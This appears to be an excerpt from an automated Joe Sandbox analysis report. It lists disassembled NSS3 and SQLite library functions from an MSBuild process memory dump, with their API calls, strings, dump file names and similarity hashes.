PR_LogPrint.NSS3(?,00000000), ref: 6CB9A5C9

Strings

(CK_INVALID_HANDLE), xrefs: 6CB9A5AC
C_MessageEncryptFinal, xrefs: 6CB9A571
hSession = 0x%x, xrefs: 6CB9A58E, 6CB9A59E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptFinal
API String ID: 332880674-1768899908
Opcode ID: fd999f305227d26b2d176de3d3d7cf2041658f589372a158c0a52dabea7f937c
Instruction ID: caa6cd7a7ea989d738ce841c04f58722bc02f1cf55aab3ee82b0415dcb365e31
Opcode Fuzzy Hash: fd999f305227d26b2d176de3d3d7cf2041658f589372a158c0a52dabea7f937c
Instruction Fuzzy Hash: 8321D4B1B011849FDB109B64DC98BAA37B5EB4331DF044039E409E7A51EB349E49CFA2

Function 6CC70ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CC70EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CC70EFA

Part of subcall function 6CB5AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CB5AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC70F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC70F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC70F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC70F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CC70ED9, 6CC70EE5, 6CC70F06, 6CC70F0B
Aborting, xrefs: 6CC70EB3

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 916f873ce3f60631afdf68cfb8c3802ffed7fbfd1a99bbdc92679a24e52d021c
Instruction ID: 53ee7c0e870d5df31beaa45650966b41dbae04cb64b8440403e7603c06611c9e
Opcode Fuzzy Hash: 916f873ce3f60631afdf68cfb8c3802ffed7fbfd1a99bbdc92679a24e52d021c
Instruction Fuzzy Hash: DA016DB5A00114ABDF11AFA4DC4989B3F3DEF46364B404064FD0997651E672E9509BB2

Function 6CC34D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC34DE0

Strings

API call with %s database connection pointer, xrefs: 6CC34DBD
misuse, xrefs: 6CC34DD5
invalid, xrefs: 6CC34DB8
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC34DCB
%s at line %d of [%.10s], xrefs: 6CC34DDA

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 4c867181e999fe0ddfb578bc0179dd2e8ccbd78af533fb00a31bf237f9e68787
Instruction ID: faf277b64b06aab4129acb2eb1575fe84d0517deddc79d250de2a4334cbb187d
Opcode Fuzzy Hash: 4c867181e999fe0ddfb578bc0179dd2e8ccbd78af533fb00a31bf237f9e68787
Instruction Fuzzy Hash: E7F0B421E146B46BD6028155EC10F863B555F01719F4619E0FD0C7BE52F20799608281

Function 6CC34DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC34E4D

Strings

API call with %s database connection pointer, xrefs: 6CC34E2A
misuse, xrefs: 6CC34E42
invalid, xrefs: 6CC34E25
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC34E38
%s at line %d of [%.10s], xrefs: 6CC34E47

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 6b84295c7c7966b3437f23d07a2e54022c3884c95ed6f2bd34f8cfd94e1a6347
Instruction ID: b69dce707ea00ef76ae749d81d3da045e10d826afac5d9fa0616d79f7f65aa61
Opcode Fuzzy Hash: 6b84295c7c7966b3437f23d07a2e54022c3884c95ed6f2bd34f8cfd94e1a6347
Instruction Fuzzy Hash: 48F02721F48978AFE6109165FC10F877B855B01329F0994B1FA0C77ED2F30B997042D1

Function 6CBA0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?,?,00000000,?,?), ref: 6CBA0CB3

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?), ref: 6CBA0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?), ref: 6CBA0DEC

Part of subcall function 6CBC0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CB62AF5,?,?,?,?,?,6CB60A1B,00000000), ref: 6CBC0F1A
Part of subcall function 6CBC0F10: malloc.MOZGLUE(00000001), ref: 6CBC0F30
Part of subcall function 6CBC0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CBC0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000), ref: 6CBA0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?,?,00000000), ref: 6CBA0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0E79

Part of subcall function 6CBB1560: TlsGetValue.KERNEL32(00000000,?,6CB80844,?), ref: 6CBB157A
Part of subcall function 6CBB1560: EnterCriticalSection.KERNEL32(?,?,?,6CB80844,?), ref: 6CBB158F
Part of subcall function 6CBB1560: PR_Unlock.NSS3(?,?,?,?,6CB80844,?), ref: 6CBB15B2

Part of subcall function 6CB7B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CB81397,00000000,?,6CB7CF93,5B5F5EC0,00000000,?,6CB81397,?), ref: 6CB7B1CB
Part of subcall function 6CB7B1A0: free.MOZGLUE(5B5F5EC0,?,6CB7CF93,5B5F5EC0,00000000,?,6CB81397,?), ref: 6CB7B1D2

Part of subcall function 6CB789E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CB788AE,-00000008), ref: 6CB78A04
Part of subcall function 6CB789E0: EnterCriticalSection.KERNEL32(?), ref: 6CB78A15
Part of subcall function 6CB789E0: memset.VCRUNTIME140(6CB788AE,00000000,00000132), ref: 6CB78A27
Part of subcall function 6CB789E0: PR_Unlock.NSS3(?), ref: 6CB78A35

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 2841fa3a477a3bde3046d616660a5439de703fdd4967182e89a585d969890994
Instruction ID: 6fa482f18d21a14a384bdfc670c88a19b1054374793951ea81f58572a9306a8d
Opcode Fuzzy Hash: 2841fa3a477a3bde3046d616660a5439de703fdd4967182e89a585d969890994
Instruction Fuzzy Hash: 7A51BAB6D052905FEB109FA4EC41ABF37A8DF05218F150464EC569BB12FB31ED1987A3

Function 6CB6E6B0 Relevance: 12.2, APIs: 8, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6CB704DC,?,?), ref: 6CB6E6C9

Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6CB704DC,?,?), ref: 6CB6E6D9

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6CB704DC,?,?), ref: 6CB6E6F4
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6CB704DC,?), ref: 6CB6E703

Part of subcall function 6CBBBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CB6E708,00000000,00000000,00000004,00000000), ref: 6CBBBE6A
Part of subcall function 6CBBBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CB704DC,?), ref: 6CBBBE7E
Part of subcall function 6CBBBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CBBBEC2

CERT_FindCertIssuer.NSS3(?,?,6CB704DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB6E71E

Part of subcall function 6CB6C870: PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,6CB62D1A), ref: 6CB6C919

Part of subcall function 6CB6E5E0: PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6CB6E755,00000000,00000004,?,?), ref: 6CB6E5F5
Part of subcall function 6CB6E5E0: PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6CB6E62C

CERT_DestroyCertificate.NSS3(?), ref: 6CB6E8AF

Part of subcall function 6CB6E5E0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6CB6E63E
Part of subcall function 6CB6E5E0: PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6CB6E65C
Part of subcall function 6CB6E5E0: SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6CB6E68E

SECITEM_CopyItem_Util.NSS3(00000000,-00000030,?), ref: 6CB6E89E

Part of subcall function 6CBBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBB8D2D,?,00000000,?), ref: 6CBBFB85
Part of subcall function 6CBBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBBFBB1

CERT_DestroyCertificate.NSS3(?), ref: 6CB6E885

Part of subcall function 6CB695B0: TlsGetValue.KERNEL32(00000000,?,6CB800D2,00000000), ref: 6CB695D2
Part of subcall function 6CB695B0: EnterCriticalSection.KERNEL32(?,?,?,6CB800D2,00000000), ref: 6CB695E7
Part of subcall function 6CB695B0: PR_Unlock.NSS3(?,?,?,?,6CB800D2,00000000), ref: 6CB69605

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$ArenaItem_$Value$CopyCriticalEnterSectionUnlock$Alloc_CertificateDestroyErrorFindMark_$AlgorithmAllocAllocateCertHashIssuerK11_Tag_Zfreememcpymemset
String ID:
API String ID: 27740541-0
Opcode ID: df6610a84f3cf606e70f1a6e2be5fcd44b1788e3884c102274e1f9974514026c
Instruction ID: 7da17c441c9df79d0dc52a3c9a7705a0162736f402376877eb68ae8084067ddc
Opcode Fuzzy Hash: df6610a84f3cf606e70f1a6e2be5fcd44b1788e3884c102274e1f9974514026c
Instruction Fuzzy Hash: B1618DB5D006499BEB08DF55CC50AFEB7B8EF08304F044269E9156AB42FB35DA45CBA1

Function 6CB56E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CB56ED8
sqlite3_value_text.NSS3(?,?), ref: 6CB56EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CB56FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CB56FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CB56FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CB57010
sqlite3_value_blob.NSS3(?,?), ref: 6CB5701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CB57052

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: a9c64a3a1838d8b1b4e758826599372ce30d69c3871672a12c6ba3b5a3a1c7dc
Instruction ID: a2853c69fa5e3bd36dd35bd1442fab5e461c63830af173eb7e24e088d2eca26a
Opcode Fuzzy Hash: a9c64a3a1838d8b1b4e758826599372ce30d69c3871672a12c6ba3b5a3a1c7dc
Instruction Fuzzy Hash: 4561D4B1E142998FDF01CFA4C8407EEB7B2EF45308F984164D414AB751E7369C25CBA1

Function 6CBC8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CBC7313), ref: 6CBC8FBB

Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CBC7313), ref: 6CBC9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CBC7313), ref: 6CBC903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CBC7313), ref: 6CBC909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CBC7313), ref: 6CBC90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CBC7313), ref: 6CBC90F1

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CBC7313), ref: 6CBC906B

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CBC7313), ref: 6CBC9128

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 52a77e693d48b1dde2daaa1adf634ea74d0b654212495a9d1c67181b84f75f37
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 5E516B71F002819BFB109F6AD885B26B3F9EF4435CF154029D915D7B61EB32E804CAA3

Function 6CBB2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CBB2D7C,6CB89192,?), ref: 6CBB248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6CBB24A2
memset.VCRUNTIME140(6CBB2D7C,00000020,6CBB2D5C), ref: 6CBB250E
memset.VCRUNTIME140(6CBB2D9C,00000020,6CBB2D7C), ref: 6CBB2535
memset.VCRUNTIME140(?,00000020,?), ref: 6CBB255C
memset.VCRUNTIME140(?,00000020,?), ref: 6CBB2583
PR_Unlock.NSS3(?), ref: 6CBB2594
PR_SetError.NSS3(00000000,00000000), ref: 6CBB25AF

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 64e3d732dd1b4072de90715e708f703859cc76cd79ff4b272001e21acf2d7d3b
Instruction ID: 8d7938a3b917d04116b2d3d7c5bb222de8b99f1011a1ae03b928d97d3987be87
Opcode Fuzzy Hash: 64e3d732dd1b4072de90715e708f703859cc76cd79ff4b272001e21acf2d7d3b
Instruction Fuzzy Hash: DA41E2B1E002855FEB119F34CD987B93B74FB59308F140668DC05EBA52FB70EA84C292

Function 6CBB05A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6CBB05DA

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

TlsGetValue.KERNEL32(00000000), ref: 6CBB060C
EnterCriticalSection.KERNEL32 ref: 6CBB0629
TlsGetValue.KERNEL32(00000000), ref: 6CBB066F
EnterCriticalSection.KERNEL32 ref: 6CBB068C
PR_Unlock.NSS3 ref: 6CBB06AA
PK11_GetNextSafe.NSS3 ref: 6CBB06C3
PR_Unlock.NSS3 ref: 6CBB06F9

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
String ID:
API String ID: 1593870348-0
Opcode ID: a9b89cb522135d92c5fd9e13cf618949e225bcb646b8cc3ee6908333e957e621
Instruction ID: 72eb369bec3002f36f162ae2a78eb5c7065fd93f9348b9297b290968a3ffbe39
Opcode Fuzzy Hash: a9b89cb522135d92c5fd9e13cf618949e225bcb646b8cc3ee6908333e957e621
Instruction Fuzzy Hash: 9B510AB4A057868FDB00DF69D58467AFBF0FF55308F108969D899AB701EB70E484CB92

Function 6CBBA470 Relevance: 12.1, APIs: 8, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CBBA4A6

Part of subcall function 6CBC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC08B4

